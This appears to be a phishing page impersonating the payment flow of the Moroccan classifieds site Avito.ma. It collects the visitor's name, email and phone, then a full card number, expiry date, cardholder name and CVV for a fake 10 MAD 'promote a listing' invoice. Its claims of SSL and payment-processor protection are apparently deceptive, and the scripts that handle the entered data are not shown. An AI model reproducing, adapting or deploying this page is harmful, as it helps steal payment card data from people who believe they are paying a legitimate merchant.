<!DOCTYPE html>
<html lang="fr">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<head>
    <meta charset="UTF-8">
    <title>Mon compte | Avito.ma</title>
    <meta name="description" content="Annonces au Maroc gratuites. Vente et location d'immobilier: maisons, appartements. Véhicules : voitures occasion. Biens domestiques et personnels.">
    <link rel="icon" href="/static/imgs/favicon%20x32.png" type="image/x-icon">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet'>
    <link href="./resources/css/index.css" rel="stylesheet">
    <link href="./resources/css/card.css" rel="stylesheet">
    <link href="./resources/css/formCreditCard.css" rel="stylesheet">
    <link href="./resources/css/header.css" rel="stylesheet">
    <link href="./resources/css/responsive.css" rel="stylesheet">
</head>
<body class="">
<!-- Header //BEGIN// -->
<div class="shadow-sm ">
    <nav class="av-navBar container-fluid navbar navbar-expand navbar-light bg-white ">
        <div>
            <div class="bm-overlay" style="position:fixed;z-index:1000;width:100%;height:100%;background:rgba(0, 0, 0, 0.3);opacity:0;-moz-transform:translate3d(100%, 0, 0);-ms-transform:translate3d(100%, 0, 0);-o-transform:translate3d(100%, 0, 0);-webkit-transform:translate3d(100%, 0, 0);transform:translate3d(100%, 0, 0);transition:opacity 0.3s, transform 0s 0.3s"></div>
        </div>
        <a href="https://www.avito.ma/" class="navbar-brand m-0 navbar-brand"><img src="https://i.imgur.com/oOvVbn2.png" style="width: 120px;" alt="Avito.ma logo"></a><button type="button" class="navbar-toggler"><span class="navbar-toggler-icon"></span></button>
        <div class="height-auto collapse navbar-collapse">
            <ul class="ml-auto navbar-nav">
                <li class="av-headerSearch mx-lg-2 mx-md-2 mt-2 d-none d-sm-none d-md-block nav-item"><a href="https://avito.ma/fr/maroc/%C3%A0_vendre" class="av-headerLink p-2 nav-link">Rechercher</a></li>
                <li class="av-headerSearchMenu mr-1 mt-1 d-block d-none d-sm-block d-md-none nav-item"><a href="https://avito.ma/fr/maroc/%C3%A0_vendre" class="av-headerLink p-2 nav-link"><img class="av-SharedHeaderSearchMenuIcon mr-lg-2 mr-md-2" style="width: 26px;" alt="Search" src="https://i.imgur.com/oRE3YTI.png"></a></li>
                <li class=" av-headerChat mx-lg-2 mx-md-2 mt-2 d-none d-sm-none d-md-block nav-item"><a href="https://forums.avito.ma/" class="av-headerLink p-2 nav-link">Forums</a></li>
                <li class=" av-headerShops mx-lg-3 mt-1 mx-md-0 mt-2 d-none d-sm-none d-md-block nav-item"><a href="https://avito.ma/fr/boutiques/maroc/%C3%A0_vendre" class="av-headerLink mx-lg-2 mx-md-2 p-2 nav-link"><span class="av-headerShop-badge">Pro</span><span class="av-headerShop-badge-down"></span>Boutiques</a></li>
                <li class="py-2 mx-lg-2 mx-md-2 nav-item d-xl-block d-lg-block d-md-block d-none ">
                    <button class="btn btn-secondary av-headerAI pb-2 d-flex justify-content-center" style="  color: #fff;background-color: #00ac64;border-color: #00ac64;" onclick="window.location.href='https://www.avito.ma/'">
                        <svg class="av-headerAISVG av-sideMenu-AISVG mr-1" height="20" style="fill:white;stroke:blue;stroke-width:0;margin-top: 3px;" viewBox="0 0 24 24" width="20" xmlns="http://www.w3.org/2000/svg">
                            <path d="M7 0L5.17 2H2C.9 2 0 2.9 0 4v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2h-3.17L13 0H7zm3 15c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5zm0-2a3 3 0 1 0 0-6 3 3 0 0 0 0 6z"></path>
                        </svg>
                        Déposer une annonce
                    </button>
                </li>
            </ul>
        </div>
    </nav>
</div>
<!-- Header  //END// -->
<div class="container-fluid">
    <div class="my-lg-3 p-lg-3  mt-4  bg-white rounded box-shadow" id="BodyContainer">
        <ul class="nav nav-tabs nav justify-content-center" id="myTab" role="tablist">
            <li class="nav-item">
                <a class="nav-link active" id="home-tab" data-toggle="tab" href="#info" role="tab" aria-controls="info" aria-selected="true"> Vos Informations </a>
            </li>
            <li class="nav-item">
                <a class="nav-link" id="profile-tab" data-toggle="tab" href="#paiement" role="tab" aria-controls="paiement" aria-selected="false"> Paiement</a>
            </li>
        </ul>
        <div class="tab-content">
            <div class="tab-pane active" id="info" role="tabpanel" aria-labelledby="info-tab">
                <div class="row">
                    <div class="col">
                        <h1 class="indexPageTitre">Vos informations </h1>
                        <p class="indexPageTitreBis"> Merci de fournir les informations suivantes.</p>
                        <div class="form-group" style="margin-top: 30px;">
                            <label htmlFor="infoSettingsPrenom"  class="">
                                Nom et Prénom
                            </label>
                            <div class="indexPageInputImgCadre">
                                <img class="indexPageInputImg" src="./resources/images/account-circle.png" />
                                <input
                                        type="text"
                                        class="form-control indexPageInputText"
                                        id="UserinfoPrenom"
                                        placeholder="Votre prénom"
                                        onChange="onChangePrenom()"
                                />
                            </div>
                            <div class="InputError" id="InputErrorPrenom" >
                                Vérifiez votre prénom
                            </div>
                        </div>
                        <div class="form-group">
                            <label  htmlFor="infoSettingsEmail">
                                E-mail
                            </label>
                            <div class="indexPageInputImgCadre">
                                <img class="indexPageInputImg" src="./resources/images/email.png" />
                                <input
                                        type="text"
                                        class="form-control indexPageInputText"
                                        id="UserinfoEmail"
                                        placeholder="Votre E-mail"
                                        onChange="onChangeEmail()"
                                />
                            </div>
                            <div class="InputError" id="InputErrorEmail"  >
                                Vérifiez votre Adresse mail
                            </div>
                        </div>
                        <div class="form-group">
                            <label htmlFor="infoSettingsTel">
                                Téléphone
                            </label>
                            <div class="indexPageInputImgCadre">
                                <img class="indexPageInputImg" src="./resources/images/phone.png" />
                                <input
                                        type="text"
                                        class="form-control indexPageInputText"
                                        id="UserinfoTEl"
                                        placeholder=" 06XX-XXX-XXX"
                                        onChange="onChangePhone()"
                                />
                            </div>
                            <div class="InputError"  id="InputErrorPhone">
                                Vérifiez votre Numero de téléphone
                            </div>
                        </div>
                    </div>
                    <div class="col av-infoSettingsImage text-center" id="informationImageCol">
                        <img style="padding-top: 1%;" src="./resources/images/profile_img.png" />
                    </div>
                    <div class="col-md-12">
                        <button class="btn indexPageBtn" onclick="clickSubmitForm()" type="submit">
                            <span class="" > Suivant </span>
                        </button>
                    </div>
                </div>
            </div>
            <div class="tab-pane  " id="paiement" role="tabpanel" aria-labelledby="paiement-tab">
                <div class="CardCreditDesktop" id="CardCreditDesktop">
                    <div class="DivDetailFacture">
                        <div class="form-group">
                            <h1 class="indexPageTitre">Détail de la facture</h1>
                            <span class="indexPageText">Marchand : Avito</span><br/>
                            <span class="indexPageText">Commande n° : 443259</span><br/>
                            <span class="indexPageText">Description : Promouvoir une annonce</span><br/>
                            <span class="indexPageText" style="color: #4a90e2;">Montant : 10.00 MAD</span>
                        </div>
                    </div>

                    <hr/>
                    <div class="row">
                        <div class="col">
                            <div class="form-group">
                                <h1 class="indexPageTitre">Paiement par carte bancaire</h1>
                                <p>Merci de fournir les informations suivantes de votre carte bancaire</p>
                            </div>
                            <form class="form" autocomplete="off" novalidate>
                                <div class="form-group">
                                    <label htmlfor="infoSettingsPrenom" class="">
                                        Numéro de Carte
                                    </label>
                                    <div class="indexPageInputImgCadre">
                                        <img class="indexPageInputImg" src="./resources/images/credit-card.png">
                                        <input type="text" class="form-control indexPageInputText" id="creditCardNumberCode" placeholder="0000 0000 0000 0000" onkeyup="onChangeCreditCardNumCode()" maxlength="19">
                                    </div>
                                    <div class="InputError" id="InputErrorCrediCardNumber">
                                        Vérifiez votre numéro de Carte
                                    </div>
                                </div>
                                <label htmlFor="infoSettingsNom">
                                    Date d'expiration
                                </label>
                                <div class="form-group row">
                                    <div class="indexPageInputImgCadre col-6">
                                        <img class="indexPageInputImg" src="./resources/images/date-range.png" />
                                        <div class="select">
                                            <select id="card-expiration-month" class="card-expirationSelect" onchange="onChangecreditCardMois()">
                                                <option selected disabled>Mois</option>
                                                <option>01</option>
                                                <option>02</option>
                                                <option>03</option>
                                                <option>04</option>
                                                <option>05</option>
                                                <option>06</option>
                                                <option>07</option>
                                                <option>08</option>
                                                <option>09</option>
                                                <option>10</option>
                                                <option>11</option>
                                                <option>12</option>
                                            </select>
                                        </div>
                                        <div class="InputError" id="InputErrorCrediCardExpiratMois" >
                                            Vérifiez le mois
                                        </div>
                                    </div>
                                    <div class="indexPageInputImgCadre col-6">
                                        <img class="indexPageInputImg" src="./resources/images/date-range.png" />
                                        <div class="select">
                                            <select id="card-expiration-year" class="card-expirationSelect"  onchange="onChangecreditCardAnnes()">
                                                <option selected disabled>Année</option>
                                                <option>2016</option>
                                                <option>2017</option>
                                                <option>2018</option>
                                                <option>2019</option>
                                                <option>2020</option>
                                                <option>2021</option>
                                                <option>2022</option>
                                                <option>2023</option>
                                                <option>2024</option>
                                                <option>2025</option>
                                            </select>
                                        </div>
                                        <div class="InputError" id="InputErrorCrediCardExpiratAnnee" >
                                            Vérifiez L'annee
                                        </div>
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="form-group col-8">
                                        <label htmlFor="infoSettingsNom">
                                            Nom et Prénom
                                        </label>
                                        <div class="indexPageInputImgCadre">
                                            <img class="indexPageInputImg" src="./resources/images/account-circle.png" />
                                            <input
                                                    type="text"
                                                    class="form-control indexPageInputText"
                                                    id="NamecreditCard"
                                                    placeholder="Nom & prénom"
                                                    onkeyup="onChangecreditCardName()"
                                            />
                                        </div>
                                        <div class="InputError" id="InputErrorCrediCardName" >
                                            Vérifiez votre Nom & prénom
                                        </div>
                                    </div>
                                    <div class="form-group col-4">
                                        <label  htmlFor="infoSettingsEmail">
                                            Ccv
                                        </label>
                                        <div class="indexPageInputImgCadre">
                                            <img class="indexPageInputImg" src="./resources/images/lock-outline.png" />
                                            <input
                                                    type="text"
                                                    class="form-control indexPageInputText"
                                                    id="creditCardCodeXXX"
                                                    placeholder="XXX"
                                                    onkeyup="onChangecreditCardCvv()"
                                                    maxlength="3"
                                            />
                                        </div>
                                        <div class="InputError" id="InputErrorCrediCardCode"  >
                                            Vérifiez votre Code de sécurité
                                        </div>
                                    </div>
                                </div>
                            </form>
                        </div>
                        <div class="col text-center ml-5">
                            <div class="CreditCardCadre px-4 mt-5" id="CreditCardCadre">
                                <form action="" method="post" class="form" id="CreditCardContent">

                                    <img class="imageCreditCards" src="./resources/images/cc_type_F.png" />
                                    <div class=" mb-4">
                                        <img class="indexPageInputImg cardNumberIcon" src="./resources/images/credit-card.png">
                                        <input type="text" class="form-control CrediCardNums indexPageInputText" id="creditCardNumber"
                                               onkeyup="onChangeCreditCardNumCodes()" placeholder="Numéro de la carte" maxlength="19">
                                    </div>
                                    <div style="display: inline-flex;">
                                        <div class="card__expiration form__field cardlabelDate mt-4 pd-0" style="padding-right: 0;margin-right: 54px;">
                                            <label > Date d’expiration </label>
                                        </div>
                                        <div class="creditCardEpirateDate">
                                            <input type="text" class="form-control creditCardMM  mt-4" id="creditCardMM" placeholder="MM" onchange="onChangecreditCardMoi()" maxlength="2">
                                            <input type="text" class="form-control creditCardMMYYYY  mt-4" id="creditCardYYYY" placeholder="AAAA" onchange="onChangecreditCardAnne()" maxlength="4">
                                        </div>
                                    </div>
                                </form>
                                <div class="mt-3" id="CreditCardFooter">
                                    <input class="card__title form-control" id="CreditCardName" placeholder="Nom et Prénom" onkeyup="onChangecreditCardName2()"> </input>
                                    <img class="indexPageInputImg validateBtnMsite CreditCardSuivantr" id="CreditCardSuiv" src="./resources/images/suivant-btn-valide.png" onclick="">
                                </div>
                            </div>
                            <div class="CrediCard_black" id="CrediCard_black"></div>
                            <div class="CrediCard_skyblue" id="CrediCard_skyblue"></div>
                            <div class="CrediCard_cvv"  id="CrediCard_cvv">
                                <div class="">
                                    <img class="indexPageInputImg" style="margin-left: 2px;" src="./resources/images/lock-outline.png" />
                                    <input
                                            type="text"
                                            class="form-control indexPageInputText CardCreditInputTextCvv"
                                            id="creditCardCvv"
                                            placeholder="XXX"
                                            onkeyup="onChangecreditCardCvv2()"
                                            maxlength="3"
                                    />
                                </div>
                            </div>
                            <div class="row" style="margin-top: -66px;position: absolute;">
                                <div class="col-4"  style="margin-left: 40px;">
                                    <img id="CrediCard_BtnRetour" src="./resources/images/retour-btn.png">
                                </div>
                                <div class="col-4" style="margin-left: 70px;">
                                    <img  id="CrediCard_BtnValider" src="./resources/images/valider-disable.png" onclick="cardNumNAvResp(5)">
                                </div>
                            </div>
                           <!-- <img style="margin-top: -80px;display: block;margin-left: 80px;"  id="CrediCard_legal" src="./resources/images/group-374.png" /> -->
                        </div>
                        <div class="col-md-12">
                            <button class="btn indexPageBtn" onclick="clickSubmitCreditCardForm()" type="submit">
                                <span class="" > Valider  </span>
                            </button>
                        </div>
                    </div>
                    <div class="Protection-des-droit" style="font-size: 13px;">Protection des droits du consommateur </div>
                    <br>
                    <div class="Protection-des-droit">Par le biais de cette page de paiement, Vantage Payment Systems collecte vos données personnelles en vue de traiter vos transactions. Ce traitement a fait l'objet d'une déclaration auprès de la CNDP sous le numéro D-CE-294/2013.</div>
                    <div class="Protection-des-droit">Grâce au protocole de sécurité « Secure Socket Layer » (SSL), vos données sont entièrement chiffrées et totalement protégées. Notre certificat SSL a été délivré par la société RapidSSL.</div>
                    <div class="row" style="margin-top: 30px;margin-bottom: 30px; max-width: 540px;">
                        <img class="col-2" src="./resources/images/verifiedByVisa.png" style=" width: 48px;height: 20px;">
                        <img class="col-2" src="./resources/images/rapidSSL.png" style="width: 51px;height: 14px;">
                        <img class="col-2" src="./resources/images/mastercard.png" style="width: 53px;height: 20px;">
                        <img class="col-2" src="./resources/images/mcAfee.png" style="width: 56px;height: 26px; margin-top: -4px;">
                        <img class="col-2" src="./resources/images/payzone.png" style="width: 68px;height: 15px;">
                        <img class="col-2" src="./resources/images/centerMonInter.png" style="width: 68px;height: 30px;">
                    </div>
                </div>
                <div class="CardCreditMsite" id="CardCreditMsite">
                    <div id="CardCreditImageMsite">
                        <div class="CreditCardCadreResp px-4 mt-3" id="CreditCardCadreResp">
                            <form action="" method="post" class="form" id="CreditCardContentResp">
                                <img class=" card__number imageCreditCards imageCreditCardsResp" src="./resources/images/cc_type_F.png" />

                                <div class=" mb-4" >
                                    <img class="indexPageInputImg cardNumberIcon cardNumberIconResp" src="./resources/images/credit-card.png">
                                    <input type="text" class="form-control CrediCardNumsResp indexPageInputText" id="creditCardNumberResp"
                                           onkeyup="onChangeCreditCardNumCodesResp()" placeholder="0000 0000 0000 0000" maxlength="19">
                                </div>
                                <div class="card_expirationDiv">
                                    <div class="card__expiration form__field cardlabelDate mt-4 pd-0 col" style="padding-right: 0;padding-left: 0 !important;">
                                        <label style="font-size: 14px;"> Date d’expiration </label>
                                    </div>
                                    <div class="creditCardEpirateDate">
                                        <input type="text" class="form-control creditCardMMResp  mt-4" id="creditCardMMResp" placeholder="MM" onchange="onChangecreditCardMoiResp()" maxlength="2">
                                        <input type="text" class="form-control creditCardMMYYYYResp  mt-4" id="creditCardYYYYResp" placeholder="AAAA" onchange="onChangecreditCardAnneResp()" maxlength="4">
                                    </div>
                                </div>
                                <div id="CreditCardFooterResp">
                                    <input type="text" class="card__title form-control" placeholder="Nom et Prénom" id="CreditCardNameResp" style="font-size: 14px;max-width: 180px;width: 64%;" onkeyup="onChangecreditCardNameResp2()"> </input>
                                    <img class="indexPageInputImg validateBtnMsite CreditCardSuivantrResp" id="CreditCardSuivRsp" src="./resources/images/suivant-btn-valide.png"  onclick="cardNumNAvResp(4)">
                                </div>
                            </form>

                        </div>
                        <div class="CrediCard_blackResp" id="CrediCard_blackResp"></div>
                        <div class="row col-12" style="margin-bottom: 32px;margin-top: -84px;">
                            <div class="CrediCard_skyblueResp col-6" id="CrediCard_skyblueResp"></div>
                            <div class="CrediCard_cvvResp col-6"  id="CrediCard_cvvResp">
                                <div class="">
                                    <img class="indexPageInputImg" style="margin-left: 10px;width: 18px;" src="./resources/images/lock-outline.png" />
                                    <input
                                            type="text"
                                            class="form-control indexPageInputText CardCreditInputTextCvv"
                                            id="creditCardCvvResp"
                                            placeholder="XXX"
                                            onkeyup="onChangecreditCardCvv2Resp()"
                                            maxlength="3"
                                            style="width: 80px;height: 32px; padding-left: 32px;"
                                    />
                                </div>

                            </div>

                        </div>
                        <div class="row ">
                            <div class="col-6">
                                <img class="" style="width: 80px;max-width: 100px;margin-left: auto;display: block;"  id="CrediCard_BtnRetoureResp" src="./resources/images/retour-btn.png" />
                            </div>
                            <div class="col-6">
                                <img class="" style="width: 80px;max-width: 100px;margin-right: auto;display: block;" id="CrediCard_BtnValiderResp" src="./resources/images/valider-disable.png" onclick="cardNumNAvResp(5)"/>
                            </div>
                        </div>
                    </div>
                    <div id="CardCreditInputMsite">
                        <nav class="CardNav">
                            <ul class="CardNav-list">
                                <li onclick="cardNumNAvResp(1)" id="cardNumNAvResp1">Numéro de Carte</li>
                                <li onclick="cardNumNAvResp(2)" id="cardNumNAvResp2" >Date d'expiration</li>
                                <li onclick="cardNumNAvResp(3)" id="cardNumNAvResp3" >Nom et Prénom</li>
                                <li onclick="cardNumNAvResp(4)" id="cardNumNAvResp4">Code de sécurité</li>
                            </ul>
                        </nav>
                        <div class="form-group" id="cardNumNavDivResp1">
                            <div class="indexPageInputImgCadre">
                                <img class="indexPageInputImg" src="./resources/images/credit-card.png" style="left: 20px;">
                                <input type="text" class="form-control indexPageInputText" style="padding-left: 50px;font-size: 4.2vw;" id="creditCardNumberCodeResp" placeholder="0000 0000 0000 0000" onkeyup="onChangeCreditCardNumCodeResp()" maxlength="19">
                                <img class="indexPageInputImg validateBtnMsite"  id="ImgArrowStep1" src="./resources/images/suivant-btn-nnvalide.png" style="right: 28px;left: unset;" onclick="cardNumNAvResp(2)">
                            </div>
                            <div class="InputError" id="InputErrorCrediCardNumberResp">
                                Vérifiez votre numéro de Carte
                            </div>
                        </div>
                        <div class="form-group row"  id="cardNumNavDivResp2">
                            <div class="indexPageInputImgCadre col-4">
                                <img class="indexPageInputImg" src="./resources/images/date-range.png" style="width: 20px;margin-left: 6px;" />
                                <div class="select" style="margin-left: -5px;">
                                    <select id="card-expiration-monthResp" onchange="onChangecreditCardMoisResp()"  class="card-expirationSelect"  style="font-size: 11px;">
                                        <option selected disabled>Mois</option>
                                        <option>01</option>
                                        <option>02</option>
                                        <option>03</option>
                                        <option>04</option>
                                        <option>05</option>
                                        <option>06</option>
                                        <option>07</option>
                                        <option>08</option>
                                        <option>09</option>
                                        <option>10</option>
                                        <option>11</option>
                                        <option>12</option>
                                    </select>
                                </div>
                                <div class="InputError" id="InputErrorCrediCardExpiratMoisResp" style="font-size: 70%;">
                                    Vérifiez le mois
                                </div>
                            </div>
                            <div class="indexPageInputImgCadre col-4">
                                <img class="indexPageInputImg" src="./resources/images/date-range.png"  style="width:20px;margin-left: 6px;" />
                                <div class="select" style="margin-left: -5px;">
                                    <select id="card-expiration-yearResp" onchange="onChangecreditCardAnnesResp()"  class="card-expirationSelect"  style="font-size: 11px;">
                                        <option selected disabled>Année</option>
                                        <option>2016</option>
                                        <option>2017</option>
                                        <option>2018</option>
                                        <option>2019</option>
                                        <option>2020</option>
                                        <option>2021</option>
                                        <option>2022</option>
                                        <option>2023</option>
                                        <option>2024</option>
                                        <option>2025</option>
                                    </select>
                                </div>
                                <div class="InputError" id="InputErrorCrediCardExpiratAnneeResp" style="font-size: 70%;">
                                    Vérifiez L'annee
                                </div>
                            </div>
                            <img class="indexPageInputImg validateBtnMsite" id="ImgArrowStep2" src="./resources/images/suivant-btn-nnvalide.png"   onclick="cardNumNAvResp(3)">
                        </div>
                        <div class="form-group" id="cardNumNavDivResp3">
                            <div class="indexPageInputImgCadre">
                                <img class="indexPageInputImg" style="left:20px;" src="./resources/images/account-circle.png" />
                                <input
                                        type="text"
                                        class="form-control indexPageInputText"
                                        id="NamecreditCardResp"
                                        placeholder="Nom & prénom"
                                        onkeyup="onChangecreditCardNameResp()"
                                        style="padding-left: 50px;"
                                />
                                <img class="indexPageInputImg validateBtnMsite" id="ImgArrowStep3" src="./resources/images/suivant-btn-nnvalide.png" style="right: 28px;left: unset;"  onclick="cardNumNAvResp(4)">
                            </div>
                            <div class="InputError" id="InputErrorCrediCardNameResp" >
                                Vérifiez votre Nom & prénom
                            </div>
                        </div>
                        <div class="form-group" id="cardNumNavDivResp4">
                            <div class="indexPageInputImgCadre">
                                <img class="indexPageInputImg" style="left:20px;" src="./resources/images/lock-outline.png" />
                                <input
                                        type="text"
                                        class="form-control indexPageInputText"
                                        id="creditCardCodeXXXResp"
                                        placeholder="XXX"
                                        onkeyup="onChangecreditCardCvvResp()"
                                        maxlength="3"
                                        style="padding-left: 50px;"
                                />
                                <img class="indexPageInputImg validateBtnMsite"  id="ImgArrowStep4" src="./resources/images/valider-disable.png"  onclick="cardNumNAvResp(5)">
                            </div>
                            <div class="InputError" id="InputErrorCrediCardCodeResp"  >
                                Votre Code de sécurité
                            </div>
                        </div>
                    </div>

                    <div style="position: relative;margin-top: 40px;">
                        <div class="Protection-des-droit">Protection des droits du consommateur </div>
                        <div class="Protection-des-droit">Par le biais de cette page de paiement, Vantage Payment Systems collecte vos données personnelles en vue de traiter vos transactions. Ce traitement a fait l'objet d'une déclaration auprès de la CNDP sous le numéro D-CE-294/2013.</div>
                        <div class="Protection-des-droit">Grâce au protocole de sécurité « Secure Socket Layer » (SSL), vos données sont entièrement chiffrées et totalement protégées. Notre certificat SSL a été délivré par la société RapidSSL.</div>
                        <div class="row" style="margin-top: 30px;margin-bottom: 30px;">
                            <img class="col-2" src="./resources/images/verifiedByVisa.png" style="width: 36px;height: 15px;">
                            <img class="col-2" src="./resources/images/rapidSSL.png" style="width: 39px;height: 11px;">
                            <img class="col-2" src="./resources/images/mastercard.png" style="width: 40px;height: 15px;">
                            <img class="col-2" src="./resources/images/mcAfee.png" style="width: 42px;height: 20px;margin-top: -4px;">
                            <img class="col-2" src="./resources/images/payzone.png" style="width: 51px;height: 12px;">
                            <img class="col-2" src="./resources/images/centerMonInter.png" style="width: 51px;height: 12px;">
                        </div>
                    </div>

                </div>


            </div>
        </div>
    </div>
</div>

<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="./resources/js/paiement.js"></script>
<script src="./resources/js/informations.js"></script>

</body>
</html>